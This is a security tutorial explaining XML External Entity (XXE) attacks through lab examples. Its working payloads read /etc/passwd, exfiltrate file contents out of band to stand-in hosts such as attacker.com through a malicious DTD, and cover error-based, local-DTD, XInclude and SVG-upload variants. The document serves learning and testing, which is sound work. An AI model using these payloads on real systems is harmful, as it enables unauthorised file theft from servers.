XML External Entity (XXE)
XXE is a vulnerability that can occur when the application processes XML data. When present, it may allow an attacker to view files from the app server or even interact with the back end or external systems.
XML and entities
XML (or “extensible markup language”) is a language that allow the storage and transmission of data and use a tree-like structure using tag (such as HTML). However, XML doesn’t use predefined tags, so they can have have any name.
An XML entity is a way to reference data within the XML document instead of using the data itself. For example, the entities <
and >
represent <
and >
respectively. It is possible to create custom entities within the DTD.
1
<!DOCTYPE test [ <!ENTITY testentity "the value" > ]>
If later we use &testentity
in the document, when processed will be replaced with “the value
”
DTD or Document type Definition contains information about how the XML document is structured, types of data value it can contain, and other item. It is declared within the
DOCTYPE
element at the start of the document.
A external entity is when the value that the entity will have is outside of the DTD where it is being declared. To declare a external entity you need to use the SYSTEM
keyword and then the URL from which the value should be obtained. We can use the [file://](file://)
to extract the value from a file. This mean that we could declare this entity:
1
<!DOCTYPE test [ <!ENTITY passwords SYSTEM "file:///etc/passwd" > ]>
XXE attacks
If an attacker can modify an XML file that will be processed by the server, if external entities are permitted, attacks such as retrieving sensitive information or performing Server Side Request Forgery could be possible.
Retrieving information
If we can modify the DOCTYPE
element to declare a external entity and edit a data value within the XML to make use of the external entity we just declared, we could try to retrieve files.
Let’s use an example using Portswigger’s Labs. In this webpage, if we want to check the stock of a product, this XML is sent to the server.
We can intercept the request and modify it. We will add a DOCTYPE
element declaring an external entity which value is the content of /etc/passwd
. Then, instead of the product id number, let’s reference the external entity we just declared.
As we can see in the response, where the server wants to write the productID
, we get the contents of the file.
What happens if the application doesn’t return any values but till proceses what we sent? We won’t be able to see the exfiltrated data in de reponse, implying that we are facing of a Blind XXE vulnerability.
When facing a Blind XXE vulnerability, we have two ways of trying to get the information:
- Generating an error that could contain the information within the error message
- Trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.
Blind XXE: Out of band interaction
It works as all the out of band techniques. The main goal is make the server interact with a host controlled by the attacker. The attacker can log the requests that the server receive, so the intention is to inject the data that we want to exfiltrate within the request.
For the XXE case, the malicious host needs to contain a malicious DTD file. Remember that a DTD is a file that defines the structure and the legal elements and attributes of an XML document.
This DTD will contain a total of 3 entities. Imagine this example
1
2
3
4
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
This DTD works as follows:
- Defines an XML parameter entity called
file
, containing the contents of the/etc/passwd
file. - Defines an XML parameter entity called
eval
, containing a dynamic declaration of another XML parameter entity calledexfiltrate
. Note that for this stacked entity, instead of%
we have to use%
.Theexfiltrate
entity will be evaluated by making an HTTP request to the attacker’s web server containing the value of thefile
entity within the URL query string (and exfiltrating the data). - Uses the
eval
entity, which causes the dynamic declaration of theexfiltrate
entity to be performed. - Uses the
exfiltrate
entity, so that its value is evaluated by re questing the specified URL.
You may be wondering: “Why we need to nest the
exfiltrate
entity within theeval
entity?” The reason for this is because if we try to reference a entity within another entity with the “%”, it won’t work, sohttp://web-attacker.com/?x=%file
will be evaluated ashttp://web-attacker.com/?x=%file
, without replacing the%file
with the data that we want to exfiltrate. However, by nesting it inside theeval
entity, when evaluatingeval
, a the nestedexfiltrate
entity will be declared and is in this process where the%file
will be replaced by the actual data. Later, when we evaluate theexfiltrate
entity, this will already contain all the data instead of%file
.
Once this file exist and is public (lets assume a hostname such as attacker.com), the idea is to inject code in the request containing the vulnerable XML to retrieve this file and interpret it.
If we inject this:
1
2
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://attacker.com/malicious.dtd"> %xxe;]>
The xxe
entity is declared as the contents of the malicious DTD file hosted in the attacker server. Once the xxe
entity is used (%xxe
), all the contents of the malicious DTD file will be interpreted too and the exfiltration will take place.
You may we wondering why we need to create a external DTD if we could add those entities directly in the XML request. The problem is that, per XML specification, the declaration of entities within other entities (stacked entities) are only allowed in external DTD.
Blind XXE: Error messages
With this other solution, we try to generate a parsing error where the error message contains the contents that we want to retrieve. Note that this will only work if the error message is returned.
Imagine this example:
1
2
3
4
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
- Defines an XML parameter entity called
file
, containing the contents of the/etc/passwd
file. - Defines an XML parameter entity called
eval
, containing a dynamic declaration of another XML parameter entity callederror
. Theerror
entity will be evaluated by loading a nonexistent file whose name contains the value of thefile
entity. - Uses the
eval
entity, which causes the dynamic declaration of theerror
entity to be performed. - Uses the
error
entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the/etc/passwd
file.
Note that the attacker also requires a server to host this DTD file, since nested entities are only available whit external DTD files.
What happens if an out of band connection is not allowed (it may be blocked by a firewall)? We still have a chance to exploit it if it uses an external DTD but hosted locally. The XML language specification has a loophole where if it uses a hybrid of internal and external DTD, the restriction of declare entities within entities is relaxed. This implies that we can trigger a error based xxe without the need of hosting a malicious DTD in a host controlled by the attacker. The attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.
In this example, imagine that the schema.dtd
file defines an entity named custom_entity
:
1
2
3
4
5
6
7
8
9
10
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
- We load a external DTD that exists in the local filesystem by declaring the
local_dtd
entity. - In this
local_dtd
thecustim_entity
is already defined, but we redefine it containing the error xxe. - Finally, we use the
local_dtd
entity, so that the external DTD is interpreted, including the redefined value of thecustom_entity
entity. This results in the desired error message.
To exploit this, you must know the path of a valid DTD file existing within the local filesystem.
XInclude
We may be missing XXE vulnerabilities if we just search for XML code in the HTTP traffic. Some applications may just send the data and it is embedded into a XML doc on the server side.
In this situation we can’t inject entities because we can’t control the DOCTYPE
element. However, we can use the XInclude
standard instead. XInclude
is a way to include other files (or portions of other files) into a single XML file.
You can place an XInclude
attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
To make use of the XInclude
functionality, we have to use the xi:include
element.
The xi
is a prefix that has to be related with a namespace, using the xmlns
attribute.
The term xmlns
stands for “XML namespace.” Namespaces are used to avoid element name conflicts between different markup vocabularies or between elements in the same vocabulary but defined in different contexts.
When you define a namespace for an XML element using the xmlns
attribute, you are essentially creating a unique identifier for that element’s content. This allows different markup languages or vocabularies to be combined within a single XML document without causing naming collisions.
The http://www.w3.org/2001/XInclude
namespace is used to indicate that the XML document is utilizing the elements and attributes defined in the XInclude
standard.
For example, if the XML document contains an element like <xi:include>
, the XML parser knows that this refers to an element defined within the http://www.w3.org/2001/XInclude
namespace. The parser can then apply the specific rules and behavior defined by the XInclude
standard to process and handle this element appropriately.
Here’s an example of how the XInclude
namespace might be used in an XML document and exfiltrate data:
1
2
3
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</root>
In this example, the xi:include
element, with the href
attribute specifying the location of the external document to be included, is used within the context of the http://www.w3.org/2001/XInclude
namespace. We must use the parse="text"
attribute because we are not including an XML file.
File Upload
Certain software applications permit users to upload files that are subsequently handled by the server. Many standard file formats incorporate XML or contain XML subcomponents. Common examples of such XML-based formats include various office document formats like DOCX and image formats such as SVG.
For instance, consider an application that allows users to upload images, intending to process or validate them on the server post-upload. While the application might anticipate receiving standard formats such as PNG or JPEG, the underlying image processing library could potentially support SVG images. Since the SVG format is XML-based, a malicious actor could exploit this capability by submitting a malevolent SVG image, thereby exposing an attack surface susceptible to XML External Entity (XXE) vulnerabilities.
For example, this is a valid svg image that tries to exploit a xxe:
1
2
3
4
5
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg viewBox="0 0 200 200" width="100" height="100" xmlns="http://www.w3.org/2000/svg">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
In this Lab example, we can upload a profile picture. If we upload a svg image with the code that we just mentioned, we can then inspect the processed picture and retrieve the hostname:
Modifying the Content Type Header
Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded
. Even though the server may be expecting to receive a response with this format, it may also accept other content types.
You can try to modify the Content-Type
header and use text/xml
.
For example, this request:
1
2
3
4
5
6
POST /action HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
variable=value
It might be possible to achieve a similar outcome by submitting the following request:
1
2
3
4
5
6
7
8
9
POST /action HTTP/1.1
Host: example.com
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?>
<root>
<variable>value</variable>
</root>
If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.